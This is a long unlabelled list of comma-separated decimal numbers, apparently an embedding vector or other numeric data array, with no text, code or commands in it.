-0.021169643849134445, -0.02431393787264824, 0.009664718061685562, -0.022676587104797363, 0.05564095452427864, -0.006469709798693657, -0.007483997847884893, 0.0407743863761425, 0.009114104323089123, 0.03266008198261261, 0.02137250266969204, -0.0009327828884124756, 0.01930045522749424, 0.005618432071059942, 0.020937805995345116, -0.010852883569896221, -0.011164415627717972, -0.007962162606418133, 0.026936596259474754, 0.01843106560409069, -0.004901185631752014, 0.005810422357171774, -0.04036867246031761, 0.03526825085282326, -0.015199833549559116, -0.011939621530473232, 0.00950532965362072, 0.005835779942572117, 0.03405110538005829, 0.031211096793413162, -0.014315953478217125, 0.0027693691663444042, 0.04885971173644066, -0.031298037618398666, 0.00039031985215842724, -0.017779024317860603, -0.023125771433115005, -0.004115112125873566, 0.009143083356320858, -0.01722840964794159, -0.02938537858426571, -0.0430927611887455, -0.019966987892985344, 0.0016889709513634443, -0.03294987604022026, 0.03686213120818138, 0.012548194266855717, 0.0268496572971344, 0.029225990176200867, -0.032225385308265686, -0.031037218868732452, -0.01974964141845703, 0.030631504952907562, -0.010555841960012913, 0.009295227006077766, 0.04958420246839523, 0.017155960202217102, -0.006621852982789278, -0.0020104642026126385, 0.005969810765236616, -0.017822492867708206, -0.007766549941152334, 0.0289217047393322, 0.011997580528259277, -0.004607766401022673, 0.017836982384324074, 0.01120788510888815, 0.005752463359385729, 0.02574843168258667, 0.020981276407837868, -0.011787477880716324, -0.0021390614565461874, 0.011642579920589924, -0.026472922414541245, 0.017721064388751984, 0.01373636070638895, 0.026994556188583374, 0.025038428604602814, 0.01982208900153637, 0.02574843168258667, -0.0171124916523695, 0.012888705357909203, -0.00007459999324055389, -0.04903358966112137, -0.004462867975234985, -0.023299649357795715, -0.0006832861108705401, 0.012272887863218784, 0.0007100017392076552, -0.007103640120476484, -0.030022932216525078, -0.009034410119056702, 0.008070835843682289, 0.019170047715306282, 0.023227199912071228, 0.01042543351650238, -0.03135599568486214, -0.003454013727605343, 0.029008643701672554, -0.012627888470888138, -0.010432679206132889, -0.004285367671400309, 0.027661088854074478, 0.02447332628071308, 0.0028436295688152313, -0.02811027318239212, 0.00705654826015234, 0.011483191512525082, 0.03668825328350067, -0.034427840262651443, -0.019662702456116676, 0.027748027816414833, -0.018764331936836243, -0.01198309101164341, -0.014678199775516987, -0.028371090069413185, 0.0004772588436026126, -0.043005820363759995, -0.002579190069809556, -0.037064988166093826, 0.010512372478842735, -0.01367840077728033, 0.0348045751452446, 0.022386789321899414, -0.01264962274581194, -0.013779830187559128, -0.005495268851518631, 0.043237656354904175, 0.010519618168473244, 0.018691882491111755, -0.017648614943027496, -0.0013774395920336246, 0.024198018014431, 0.00028187251882627606, -0.0010333061218261719, -0.0015295828925445676, -0.02298087254166603, 0.017358819022774696, -0.0031189362052828074, -0.006045882124453783, 0.016605347394943237, 0.028298640623688698, -0.0016400677850469947, -0.026545371860265732, -0.014489831402897835, 0.053670335561037064, -0.007752059958875179, 0.004100622143596411, -0.024444345384836197, 0.0395282618701458, -0.0069877211935818195, 0.022488219663500786, -0.02702353522181511, 0.004115112125873566, 0.005411952268332243, -0.00632481137290597, 0.01223666314035654, 0.006817465648055077, 0.016257591545581818, -0.00541557464748621, -0.008418592624366283, 0.016054732725024223, 0.014569525606930256, 0.02621210552752018, 0.023459037765860558, 0.005745218135416508, -0.01854698546230793, -0.011345538310706615, -0.01572146825492382, -0.01296115480363369, -0.007052925415337086, 0.012178703211247921, -0.04071642830967903, 0.0012352581834420562, 0.010889108292758465, 0.00416220398619771, 0.027327822521328926, -0.007607161533087492, -0.015706976875662804, 0.019199026748538017, -0.010164616629481316, -0.021850666031241417, -0.029066601768136024, -0.00993277970701456, 0.0017378742340952158, -0.0425131656229496, -0.020807398483157158, 0.006773996166884899, 0.01238156110048294, -0.02431393787264824, 0.011410742066800594, 0.01002696342766285, -0.006129198707640171, -0.005477156490087509, -0.012200438417494297, 0.007737569976598024, 0.00005880834214622155, -0.025154348462820053, -0.003196819219738245, -0.008737368509173393, 0.0071579767391085625, 0.015735957771539688, -0.004328837152570486, -0.012265642173588276, -0.0313270166516304, 0.03871683031320572, -0.018416576087474823, -0.029283950105309486, -0.030312728136777878, 0.018358616158366203, 0.021285561844706535, -0.008715634234249592, -0.029298439621925354, 0.034080084413290024, 0.009614002890884876, 0.020517602562904358, 0.04216540977358818, 0.009440124966204166, 0.021401481702923775, -0.004821491427719593, 0.034485798329114914, 0.002244112780317664, 0.010809414088726044, 0.01796739175915718, 0.02973313443362713, -0.0448315404355526, 0.03158783167600632, -0.016489429399371147, -0.0014815853210166097, 0.03970213979482651, 0.015475139953196049, -0.022720055654644966, -0.0014661898603662848, -0.006621852982789278, -0.039093565195798874, 0.037470705807209015, -0.01105574145913124, -0.0390356071293354, -0.04480256140232086, 0.010997782461345196, 0.04280296340584755, -0.01589534617960453, -0.03254416212439537, -0.02189413644373417, -0.006965986452996731, 0.011193394660949707, -0.018054330721497536, 0.02229985035955906, -0.024284958839416504, 0.01848902553319931, 0.01957576349377632, -0.010925333015620708, 0.0070022111758589745, 0.025675982236862183, -0.03865887224674225, -0.013156767003238201, 0.012033805251121521, 0.01969168148934841, 0.010613801889121532, -0.018865760415792465, 0.028414560481905937, 0.04828011989593506, 0.022430259734392166, -0.012606153264641762, -0.0022133218590170145, -0.0372098870575428, -0.005991545505821705, -0.01889474131166935, 0.011838192120194435, -0.012055539526045322, -0.023951692506670952, -0.004057152662426233, -0.006810220889747143, -0.011396252550184727, 0.003588044550269842, -0.012287377379834652, 0.024400876834988594, -0.008483796380460262, 0.010113902390003204, -0.005469911266118288, 0.0021897759288549423, 0.01083114929497242, -0.019894538447260857, -0.0077303252182900906, 0.001860132091678679, -0.01097604725509882, 0.01767759397625923, 0.000904708867892623, -0.028834765776991844, 0.012287377379834652, -0.007911448366940022, -0.010519618168473244, -0.03152987360954285, -0.03477559611201286, 0.015315752476453781, -0.013352380134165287, 0.011584619991481304, 0.043411534279584885, 0.0007557352655567229, -0.030486606061458588, 0.02903762273490429, -0.010244310833513737, -0.007983896881341934, -0.018996169790625572, -0.02719741500914097, 0.0026136033702641726, -0.008469306863844395, -0.037702541798353195, -0.0008440326782874763, 0.0059335860423743725, -0.0030700331553816795, -0.007049303036183119, 0.023995161056518555, -0.021908625960350037, -0.008947471156716347, 0.010563087649643421, -0.0019651835318654776, 0.008440326899290085, 0.007223180960863829, -0.013033603318035603, -0.004531695041805506, -0.010794924572110176, -0.009918290190398693, 0.01596779376268387, -0.00035930253216065466, 0.005372105166316032, -0.013033603318035603, -0.019372904673218727, 0.015272282995283604, -0.012598908506333828, 0.02292291447520256, 0.016866164281964302, 0.014895547181367874, 0.005248941481113434, -0.024169038981199265, -0.03996295481920242, 0.02263311669230461, 0.012874215841293335, -0.003104446455836296, -0.019112087786197662, 0.002486817305907607, -0.019604742527008057, 0.016315549612045288, 0.026414962485432625, -0.012888705357909203, 0.0048758285120129585, -0.018460046499967575, -0.016228610649704933, 0.005180114880204201, -0.0013421206967905164, 0.02396618202328682, -0.0038253155071288347, -0.04373031109571457, 0.017184941098093987, 0.029472317546606064, 0.037412744015455246, 0.00880981795489788, -0.030950279906392097, -0.024444345384836197, -0.018184738233685493, 0.029283950105309486, -0.0042889900505542755, 0.00021349861344788224, -0.020068416371941566, 0.004285367671400309, -0.015025955624878407, -0.016866164281964302, 0.016721265390515327, -0.008722878992557526, -0.008063591085374355, 0.0004265444295015186, -0.02102474495768547, 0.01618514209985733, 0.004350571893155575, 0.016866164281964302, -0.01906861923635006, -0.001970617100596428, -0.0019941630307585, 0.020691480487585068, -0.024676183238625526, 0.010809414088726044, 0.009135838598012924, -0.00011461683607194573, 0.0036786061245948076, -0.0502217561006546, 0.014308708719909191, -0.028414560481905937, 0.013091563247144222, 0.017938410863280296, -0.026762718334794044, 0.026472922414541245, -0.009954513981938362, 0.0014526055892929435, -0.01425799448043108, -0.00904889963567257, -0.02067698910832405, 0.031906608492136, -0.030776401981711388, -0.013432074338197708, -0.016909632831811905, 0.002283959649503231, 0.009230023249983788, -0.0048758285120129585, -0.018503515049815178, 0.008795327506959438, 0.0010749644134193659, -0.007161599118262529, -0.02793639525771141, -0.016924124211072922, -0.018329637125134468, -0.04071642830967903, 0.030283749103546143, -0.03932540491223335, -0.0039774589240550995, -0.009070634841918945, 0.008099815808236599, 0.022140461951494217, -0.0009916478302329779, 0.030602524057030678, -0.007817264646291733, 0.012287377379834652, -0.028660887852311134, -0.023763323202729225, 0.028371090069413185, -0.021285561844706535, -0.006147311069071293, 0.016779225319623947, -0.05787238851189613, 0.020532092079520226, -0.020488621667027473, 0.0011066609295085073, 0.020010458305478096, 0.031993549317121506, 0.0068464456126093864, -0.005980677902698517, -0.01877882145345211, -0.022154953330755234, 0.0023056943900883198, -0.002914267359301448, 0.014279728755354881, -0.006328434217721224, 0.002164418576285243, -0.032225385308265686, 0.02671924978494644, -0.04799032211303711, -0.01030951552093029, -0.02038719318807125, -0.03457273915410042, -0.01872086338698864, -0.02240128070116043, -0.006835578009486198, -0.0013122353702783585, 0.008193999528884888, 0.0010921710636466742, 0.008121551014482975, 0.027834966778755188, -0.010099412873387337, 0.02673373930156231, -0.022850465029478073, 0.007005833555012941, -0.012794521637260914, 0.0071543543599545956, 0.015706976875662804, -0.005756085738539696, 0.02499496005475521, 0.008520021103322506, -0.024270467460155487, -0.003278324380517006, 0.0024487816262990236, 0.012425030581653118, -0.005502513609826565, -0.03584784269332886, -0.011439722031354904, -0.014381158165633678, -0.00597705552354455, -0.02425597794353962, -0.009599513374269009, 0.025603532791137695, -0.04584582895040512, 0.015764936804771423, 0.011251354590058327, -0.00993277970701456, -0.011475946754217148, 0.01149768102914095, 0.0037528665270656347, 0.03231232613325119, -0.0003319077077321708, 0.002472327556461096, 0.018242698162794113, -0.03587682172656059, 0.004817869048565626, -0.032167427241802216, -0.0224592387676239, 0.007244915701448917, 0.012548194266855717, -0.028371090069413185, -0.04938134551048279, -0.006553026381880045, 0.019097598269581795, 0.04596174508333206, -0.001621049945242703, -0.03225436434149742, -0.019459843635559082, -0.030718443915247917, -0.003417789004743099, -0.008367877453565598, 0.002566511509940028, -0.014670955017209053, -0.012714827433228493, 0.014786873012781143, 0.030805382877588272, 0.014852077700197697, -0.03184865042567253, 0.033732328563928604, 0.02287944406270981, 0.008143285289406776, -0.005806799978017807, -0.030921300873160362, -0.017836982384324074, -0.013671156018972397, -0.03561600670218468, 0.010338494554162025, 0.0074912430718541145, 0.07818713039159775, 0.007205068599432707, -0.008136040531098843, 0.004716440103948116, 0.0221694428473711, -0.011881661601364613, 0.00006265720003284514, -0.04332459717988968, 0.021691277623176575, 0.0023292405530810356, 0.02748721092939377, 0.00965022761374712, -0.009990738704800606, -0.017199430614709854, 0.023705365136265755, 0.030776401981711388, -0.0029486806597560644, -0.02483557164669037, 0.006132821086794138, -0.0035807995591312647, -0.04164377599954605, 0.0004695611132774502, 0.022140461951494217, 0.022024543955922127, -0.010584821924567223, -0.022430259734392166, 0.0277625173330307, -0.009077879600226879, -0.019329436123371124, -0.018460046499967575, -0.03141395375132561, -0.027153944596648216, -0.02499496005475521, -0.006476954557001591, -0.016387999057769775, -0.01463473029434681, 0.02470516227185726, -0.021053725853562355, -0.026661289855837822, -0.03312375396490097, 0.016561876982450485, 0.021923115476965904, 0.028182722628116608, -0.025531083345413208, -0.016924124211072922, 0.016721265390515327, -0.0031515383161604404, -0.017083510756492615, -0.006201648153364658, -0.02119862288236618, -0.031211096793413162, 0.0023690874222666025, -0.005136645399034023, 0.0236184261739254, 0.05126502364873886, -0.009056144393980503, 0.03970213979482651, 0.0063393013551831245, -0.039267443120479584, -0.02108270488679409, 0.0013756284024566412, 0.008961960673332214, -0.04080336540937424, 0.022792505100369453, -0.03323967382311821, -0.015417180955410004, -0.008882266469299793, 0.003720264183357358, 0.025647001340985298, -0.0055242483504116535, -0.005795932840555906, 0.012374316342175007, 0.01572146825492382, 0.02137250266969204, -0.041788674890995026, 0.030341707170009613, -0.011744008399546146, 0.005133023019880056, -0.041556838899850845, 0.00016810468514449894, -0.04509235545992851, -0.04381725192070007, -0.022488219663500786, 0.016112692654132843, 0.0029504920821636915, -0.023401077836751938, -0.008606960065662861, 0.0018709994619712234, 0.012012070044875145, -0.024241488426923752, 0.012874215841293335, -0.011142680421471596, 0.006802976131439209, 0.00786073412746191, -0.0036224578507244587, -0.012845235876739025, -0.023314138874411583, -0.031819671392440796, 0.028211701661348343, 0.013591461814939976, 0.033732328563928604, -0.032225385308265686, -0.0022531687282025814, -0.0006620041676796973, -0.003042864613234997, 0.0074912430718541145, 0.03576090559363365, 0.010063188150525093, -0.006600118242204189, 0.0049591450951993465, 0.01796739175915718, 0.013011869043111801, 0.007049303036183119, 0.004937410354614258, 0.005277920980006456, 0.0007444150978699327, -0.0037419989239424467, 0.013924728147685528, -0.022314341738820076, 0.013374114409089088, -0.004350571893155575, 0.03532620891928673, 0.02073494903743267, -0.039615198969841, -0.02458924427628517, -0.017836982384324074, 0.025429654866456985, 0.032283343374729156, 0.019083108752965927, -0.009382165968418121, -0.011584619991481304, 0.01338860485702753, -0.0002981735742650926, 0.04741073027253151, -0.010490638203918934, -0.017025552690029144, -0.004212918691337109, 0.004589654039591551, -0.008259204216301441, 0.006784863770008087, -0.02183617651462555, -0.007853488437831402, -0.033210694789886475, 0.014526056125760078, -0.023951692506670952, -0.013830544427037239, -0.030515585094690323, -0.0034612584859132767, 0.010193596594035625, -0.010968802496790886, 0.00720144622027874, 0.0036405702121555805, 0.029052112251520157, -0.019445354118943214, -0.03567396476864815, 0.026748228818178177, 0.0005750652053393424, 0.007911448366940022, -0.011374518275260925, -0.002104648156091571, -0.007462263107299805, -0.013830544427037239, -0.026081696152687073, -0.0038108257576823235, 0.010852883569896221, -0.04952624440193176, 0.010947068221867085, -0.006455219816416502, -0.034833554178476334, 0.014584016054868698, -0.01606922410428524, -0.018416576087474823, -0.019778620451688766, 0.01901065930724144, -0.018532494083046913, -0.02638598345220089, 0.00416220398619771, 0.010258801281452179, 0.06816016882658005, 0.030370688065886497, -0.024850061163306236, -0.020184336230158806, -0.0070710377767682076, 0.0036170242819935083, 0.0007435095030814409, 0.016387999057769775, -0.0020340101327747107, 0.0009300660458393395, 0.03323967382311821, -0.004912052769213915, 0.0033833757042884827, -0.0004116017953492701, 0.023488016799092293, -0.003803580766543746, -0.015344731509685516, -0.010396454483270645, 0.0031533497385680676, -0.008592470549046993, 0.004600521642714739, 0.009418390691280365, 0.013149522244930267, -0.014424627646803856, 0.009592268615961075, -0.010642780922353268, 0.010729720816016197, -0.030602524057030678, -0.01178023312240839, -0.006650832947343588, -0.004321592394262552, -0.003164217108860612, -0.009215532802045345, -0.0003857917618006468, 0.020242294296622276, -0.008693899028003216, 0.018068820238113403, -0.001459850580431521, -0.0016056544845923781, -0.028356600552797318, 0.012577174231410027, -0.002454215195029974, -0.008237469010055065, -0.010468902997672558, -0.0005257091834209859, -0.02154638059437275, 0.04268704354763031, -0.003196819219738245, -0.013794319704174995, -0.009773391298949718, -0.012620643712580204, -0.02003943733870983, 0.002952303271740675, 0.03158783167600632, -0.006571138743311167, 0.018822291865944862, -0.003164217108860612, -0.0008644090266898274, 0.0020792908035218716, -0.01709800213575363, -0.013287175446748734, 0.0055242483504116535, -0.006629098206758499, 0.01676473580300808, 0.01998147740960121, -0.032573141157627106, -0.025661492720246315, -0.0037890910170972347, -0.0022368677891790867, 0.018503515049815178, 0.0034576361067593098, 0.006643587723374367, -0.005270676221698523, -0.006107463967055082, 0.024357406422495842, 0.033210694789886475, -0.005321390461176634, -0.004513582680374384, -0.03947030007839203, -0.014417382888495922, 0.026632310822606087, 0.01969168148934841, 0.011830947361886501, 0.024270467460155487, -0.013468298129737377, 0.029052112251520157, -0.007368079386651516, 0.0037746012676507235, -0.004607766401022673, 0.0020756684243679047, -0.007947673089802265, -0.0032855693716555834, 0.021879645064473152, 0.03300783783197403, 0.012707582674920559, 0.020024947822093964, 0.0031660282984375954, 0.00029092864133417606, -0.005958943162113428, -0.011729518882930279, 0.037528663873672485, -0.004495470318943262, 0.023009853437542915, 0.01895269937813282, -0.019677191972732544, 0.003358018584549427, 0.012142479419708252, 0.007060170639306307, -0.005230829119682312, -0.005393839906901121, -0.047671545296907425, -0.016663307324051857, -0.005698126275092363, -0.023647405207157135, -0.010403699241578579, 0.0029504920821636915, 0.0006135537987574935, 0.011881661601364613, -0.006129198707640171, -0.018068820238113403, -0.02719741500914097, 0.00034051103284582496, 0.005795932840555906, -0.013055338524281979, -0.0056111873127520084, 0.0018139458261430264, 0.004890318028628826, -0.004817869048565626, 0.042194388806819916, 0.02429944835603237, 0.026125166565179825, 0.015127384103834629, -0.008085326291620731, -0.016083713620901108, 0.025835370644927025, -0.028718845918774605, 0.013743605464696884, 0.0040607755072414875, 0.010439923964440823, -0.00890400167554617, -0.004165826831012964, 0.030689463019371033, 0.025951288640499115, 0.032804977148771286, -0.0013294420205056667, -0.0005565001047216356, 0.010142882354557514, -0.0023781436029821634, 0.009715432301163673, 0.0017713819397613406, -0.006132821086794138, -0.012417785823345184, 0.009201043285429478, 0.03912254422903061, 0.0018854893278330564, 0.0033670745324343443, -0.001844736747443676, -0.026472922414541245, 0.000590913463383913, 0.02234332077205181, -0.00019923518993891776, 0.034427840262651443, 0.027327822521328926, -0.01367840077728033, -0.007259405683726072, 0.031819671392440796, -0.01601126417517662, -0.055843811482191086, -0.019372904673218727, -0.02057556062936783, -0.0003701699315570295, 0.012968399561941624, -0.007371701765805483, 0.005049706436693668, 0.01757616549730301, 0.011012271977961063, -0.008599715307354927, 0.00027689163107424974, 0.014815852977335453, -0.028298640623688698, -0.0038144481368362904, 0.04677317664027214, 0.004332459531724453, 0.006208892911672592, 0.02264760620892048, -0.007824509404599667, 0.009316962212324142, 0.001925336429849267, -0.03486253693699837, 0.02984905242919922, 0.01140349730849266, 0.03984703868627548, -0.0330657958984375, -0.00492654275149107, -0.0348915159702301, -0.025820879265666008, -0.01105574145913124, -0.0007484903908334672, -0.011236864142119884, 0.018112288787961006, -0.0004451095301192254, 0.005495268851518631, -0.00789695791900158, 0.018242698162794113, -0.016663307324051857, -0.03486253693699837, -0.00038443334051407874, 0.020952297374606133, -0.008911246433854103, -0.007773794699460268, -0.023241689428687096, 0.01238156110048294, 0.018633924424648285, -0.008157774806022644, 0.010157371871173382, -0.004292612429708242, 0.018851270899176598, -0.021807197481393814, 0.0069877211935818195, 0.03318171575665474, -0.0236184261739254, 0.03454376012086868, 0.002128194086253643, 0.0025212306063622236, -0.012707582674920559, 0.00016934990708250552, 0.03225436434149742, -0.01750371605157852, -0.00629220949485898, 0.007556447293609381, 0.01775004342198372, 0.00875185802578926, 0.00695511931553483, 0.01647493802011013, -0.016967592760920525, 0.0019180914387106895, -0.015373711474239826, 0.006484199780970812, -0.0037782236468046904, -0.027965374290943146, -0.0020557448733597994, 0.003991948440670967, -0.02247372828423977, 0.0023600312415510416, -0.010794924572110176, -0.00022696962696500123, -0.005647412035614252, 0.015953304246068, -0.018590454012155533, 0.024226998910307884, -0.01790943183004856, 0.0004116017953492701, -0.0055966973304748535, 0.002008653013035655, -0.01854698546230793, 0.0248210821300745, 0.025502104312181473, 0.008288184180855751, 0.020865358412265778, -0.0009563288767822087, 0.00887502171099186, -0.0037419989239424467, -0.02385026216506958, 0.0131350327283144, -0.02183617651462555, 0.0353841707110405, 0.002367276232689619, 0.007371701765805483, -0.005296033341437578, 0.002736767055466771, 0.004354194272309542, 0.0017107058083638549, 0.01906861923635006, 0.01883678138256073, -0.016924124211072922, -0.0000301682830468053, -0.008331653662025928, -0.03445681929588318, -0.015866365283727646, 0.004122357349842787, -0.015634529292583466, 0.04958420246839523, -0.010171862319111824, 0.00011076797090936452, 0.015982285141944885, -0.006140066310763359, -0.04419398680329323, -0.0017514583887532353, -0.006400883197784424, -0.006534914020448923, 0.013272685930132866, 0.0014109474141150713, -0.023198220878839493, -0.011903396807610989, 0.015692487359046936, -0.006723281927406788, -0.01709800213575363, 0.03512335196137428, -0.016924124211072922, 0.006234250031411648, 0.03393518552184105, 0.012975644320249557, 0.02379230409860611, 0.016489429399371147, -0.012939419597387314, 0.015996774658560753, -0.018242698162794113, 0.006549404002726078, 0.013511767610907555, -0.0024759499356150627, 0.013265441171824932, -0.034485798329114914, -0.015330241993069649, -0.021937604993581772, 0.0008847853750921786, 0.008404102176427841, -0.007447773590683937, 0.023980671539902687, 0.0052851662039756775, 0.005821289960294962, 0.015692487359046936, 0.0008331653079949319, -0.015605548396706581, -0.03135599568486214, 0.006962364073842764, 0.005353992804884911, -0.0022694699000567198, 0.005390217527747154, 0.005955320782959461, -0.025647001340985298, 0.02292291447520256, 0.030341707170009613, 0.03802131861448288, 0.001314046559855342, 0.02263311669230461, -0.005759708117693663, 0.00186918827239424, 0.021647809073328972, -0.004292612429708242, -0.003930367063730955, -0.012222172692418098, 0.038166217505931854, -0.012939419597387314, -0.017315348610281944, 0.025255776941776276, 0.009063390083611012, 0.00873012375086546, 0.005574962589889765, 0.006505934521555901, -0.015446160919964314, -0.01779351383447647, -0.013750850223004818, -0.00815053004771471, 0.00171342259272933, 0.012606153264641762, 0.016982082277536392, 0.01045441348105669, 0.007795529440045357, 0.009693697094917297, -0.019677191972732544, -0.017126981168985367, 0.016402488574385643, -0.011338293552398682, -0.013924728147685528, 0.00835338793694973, 0.019329436123371124, -0.0028400069568306208, -0.0003092673432547599, 0.017721064388751984, -0.02211148291826248, -0.008621449582278728, 0.00646608741953969, 0.0034703146666288376, 0.007940427400171757, -0.02298087254166603, 0.020010458305478096, 0.013685646466910839, -0.012968399561941624, -0.015982285141944885, 0.022270871326327324, 0.003651437582448125, -0.00855624582618475, 0.02476312220096588, -0.005553227849304676, -0.03158783167600632, 0.001236163778230548, -0.015257792547345161, 0.00936043169349432, 0.0022495463490486145, -0.023198220878839493, -0.002242301357910037, 0.022546177729964256, -0.009911044500768185, 0.038398053497076035, 0.008389612659811974, 0.0022133218590170145, 0.004491847939789295, 0.007317365147173405, -0.01641697995364666, 0.009396655485033989, 0.03184865042567253, 0.019372904673218727, -0.009498084895312786, 0.017938410863280296, -0.001821190700866282, -0.005339502822607756, -0.005741595756262541, -0.013721870258450508, 0.02642945386469364, 0.0003423222806304693, 0.0005352181615307927, -0.011859927326440811, 0.011997580528259277, -0.013975442387163639, -0.017242899164557457, -0.014620239846408367, -0.015692487359046936, -0.010142882354557514, 0.012439520098268986, 0.015808407217264175, -0.0015603736974298954, 0.013888503424823284, -0.0236184261739254, -0.024241488426923752, 0.005929963663220406, -0.009592268615961075, 0.004042663145810366, -0.005404707044363022, 0.008027366362512112, 0.0072268033400177956, 0.009874820709228516, 0.026806188747286797, 0.03213844820857048, -0.005364860408008099, 0.00447735795751214, -0.01999596692621708, 0.0018411142518743873, -0.0022948270197957754, 0.0019036016892641783, 0.006618230603635311, 0.005296033341437578, -0.011345538310706615, -0.017590655013918877, 0.009237268008291721, 0.0020014080218970776, -0.013062583282589912, -0.003104446455836296, -0.0030030175112187862, -0.007882468402385712, 0.002363653853535652, 0.025255776941776276, -0.0001429738913429901, 0.01235982682555914, 0.005940830800682306, 0.007219558581709862, -0.018387597054243088, 0.011729518882930279, -0.005897361319512129, -0.0005506136221811175, 0.0008825213299132884, 0.016214121133089066, -0.013540747575461864, 0.021329032257199287, -0.0008802572847343981, 0.008737368509173393, 0.007925937883555889, 0.014794117771089077, -0.014699934050440788, -0.013381359167397022, -0.018184738233685493, 0.030950279906392097, -0.010700740851461887, 0.006973231676965952, -0.00457878690212965, 0.009019920602440834, -0.004922920372337103, -0.018981680274009705, -0.0221694428473711, 0.012917685322463512, -0.005071441177278757, -0.008128795772790909, -0.0033670745324343443, -0.010005229152739048, -0.00950532965362072, -0.005502513609826565, 0.0011039440287277102, 0.011917886324226856, 0.013620441779494286, 0.009295227006077766, -0.0010650026379153132, -0.004075265023857355, 0.009954513981938362, -0.016460448503494263, 0.005426441784948111, 0.014641975052654743, 0.008599715307354927, 0.0043723066337406635, 0.03289191797375679, 0.022328831255435944, 0.013475543819367886, -0.00363513664342463, -0.018170248717069626, 0.015750447288155556, -0.01330891065299511, 0.021401481702923775, -0.011338293552398682, -0.011533905752003193, -0.0009291604510508478, 0.006129198707640171, -0.02534271590411663, 0.0069913435727357864, -0.0005533304647542536, -0.005719861015677452, 0.011454211547970772, -0.0021390614565461874, -0.003486615838482976, -0.00035635929089039564, -0.01132380310446024, -0.014214524999260902, -0.0011863550171256065, 0.013663911260664463, 0.0025176082272082567, 0.005759708117693663, -0.01624310202896595, -0.004575164522975683, 0.005929963663220406, 0.0003063241019845009, 0.016735754907131195, -0.01143247727304697, -0.02470516227185726, -0.009860330261290073, -0.015431670472025871, -0.006734149064868689, -0.010881863534450531, -0.012664113193750381, -0.005741595756262541, 0.02235781028866768, -0.01579391583800316, -0.0004863149661105126, -0.013917483389377594, 0.008686654269695282, -0.014192789793014526, 0.0038108257576823235, 0.021633319556713104, 0.005194604862481356, -0.021039236336946487, 0.005180114880204201, -0.030051911249756813, -0.02431393787264824, 0.019430864602327347, 0.003399676876142621, -0.002791103906929493, -0.01883678138256073, -0.021908625960350037, -0.019083108752965927, 0.0132799306884408, 0.01728636957705021, -0.001698932726867497, -0.019735150039196014, 0.019430864602327347, 0.006371903698891401, -0.002570133889093995, 0.02027127519249916, 0.02960272692143917, 0.01872086338698864, 0.018068820238113403, 0.0024252356961369514, 0.017242899164557457, 0.0013656666269525886, -0.025733940303325653, -0.012910439632833004, 0.0009744411800056696, -0.009143083356320858, 0.018344126641750336, -0.00999798346310854, 0.01010665763169527, -0.001017910661175847, -0.00004556372732622549, 0.020010458305478096, -0.008302673697471619, 0.013091563247144222, 0.02327067032456398, -0.014185545034706593, -0.01330891065299511, 0.01157737523317337, -0.010121147148311138, 0.00597705552354455, -0.030718443915247917, -0.021589849144220352, -0.007067415397614241, -0.007766549941152334, 0.028139254078269005, -0.026574350893497467, -0.008063591085374355, -0.016663307324051857, 0.004857716150581837, -0.033326614648103714, -0.0005026160506531596, 0.005176492501050234, 0.002638960490003228, 0.008367877453565598, 0.011823702603578568, -0.02741476148366928, -0.02022780478000641, -0.014352178201079369, 0.0011030384339392185, 0.019778620451688766, 0.009418390691280365, -0.019155558198690414, -0.01307707279920578, 0.006505934521555901, -0.024850061163306236, 0.0065928734838962555, 0.009483594447374344, -0.01059931144118309, 0.00024157266307156533, 0.01005594339221716, -0.0030736555345356464, -0.0037927133962512016, -0.021575359627604485, 0.0005279732285998762, 0.011693294160068035, 0.003271079622209072, -0.004328837152570486, 0.011772988364100456, -0.0014906413853168488, 0.016518408432602882, 0.00137925089802593, 0.008520021103322506, 0.010519618168473244, 0.013743605464696884, 0.027690067887306213, 0.010925333015620708, 0.01157737523317337, 0.006940629333257675, 0.0038108257576823235, -0.0069877211935818195, -0.003908632323145866, 0.004810624290257692, -0.009831351228058338, -0.010736965574324131, -0.009063390083611012, -0.0016110881697386503, 0.014823097735643387, -0.006716037169098854, -0.004310724791139364, 0.004560674540698528, -0.01247574482113123, 0.011613599956035614, 0.0033308500424027443, 0.01947433315217495, 0.017040042206645012, -0.014707178808748722, 0.005107665900141001, 0.010671760886907578, -0.01307707279920578, -0.020662499591708183, -0.01010665763169527, -0.022850465029478073, 0.022792505100369453, 0.013164011761546135, 0.007440528366714716, -0.021749237552285194, 0.019952498376369476, 0.018228208646178246, 0.010968802496790886, -0.004227408207952976, 0.007549202535301447, 0.009085124358534813, 0.022256381809711456, 0.0019199027447029948, 0.014011667110025883, -0.004343327134847641, -0.012910439632833004, -0.0046258787624537945, -0.016387999057769775, -0.0057741980999708176, -0.005640166811645031, -0.02724088355898857, 0.0048649609088897705, -0.006571138743311167, -0.016561876982450485, -0.007918693125247955, -0.0027476344257593155, -0.01235982682555914, -0.010939822532236576, -0.012772786431014538, -0.0075636920519173145, -0.006415373180061579, -0.015040445141494274, 0.00016097298066597432, 0.0036586825735867023, 0.014098606072366238, -0.0038724076002836227, -0.0034703146666288376, -0.04332459717988968, -0.020140865817666054, 0.018213719129562378, -0.0039629689417779446, 0.0013212915509939194, -0.007592672016471624, -0.007052925415337086, -0.002082913415506482, 0.021285561844706535, -0.008585224859416485, 0.020807398483157158, -0.0077448152005672455, 0.0044701131992042065, 0.016953103244304657, -0.012772786431014538, 0.03738376498222351, -0.006020525004714727, 0.0024234242737293243, -0.021807197481393814, -0.009867575019598007, 0.02414005994796753, -0.00016006735677365214, -0.023995161056518555, 0.025603532791137695, -0.022386789321899414, -0.011946866288781166, 0.010563087649643421, 0.008621449582278728, -0.0147506482899189, 0.009911044500768185, -0.004669348243623972, -0.004031795542687178, -0.00786073412746191, -0.021981075406074524, 0.010997782461345196, 0.04089030623435974, 0.006038637366145849, 0.03639845550060272, -0.015706976875662804, -0.000026531673938734457, 0.001976050902158022, -0.009983493946492672, -0.04031071066856384, -0.008172265253961086, 0.006524046882987022, 0.02961721643805504, 0.008570735342800617, -0.0021028367336839437, -0.0039774589240550995, -0.003513784147799015, -0.004734552465379238, 0.007715835236012936, -0.0005795932956971228, -0.031124157831072807, 0.02067698910832405, -0.01699657179415226, 0.012816255912184715, -0.006708791945129633, 0.012707582674920559, 0.006169045809656382, 0.0013303476152941585, -0.01699657179415226, -0.013323400169610977, 0.0008725595544092357, -0.025951288640499115, -0.007078283000737429, 0.006027769763022661, 0.027211904525756836, 0.013294420205056667, 0.014852077700197697, 0.02195209451019764, -0.008172265253961086, -0.006810220889747143, -0.014489831402897835, -0.014649219810962677, 0.009461860172450542, 0.01918453723192215, 0.028849255293607712, -0.002012275392189622, 0.0007824508938938379, -0.016851674765348434, 0.013671156018972397, 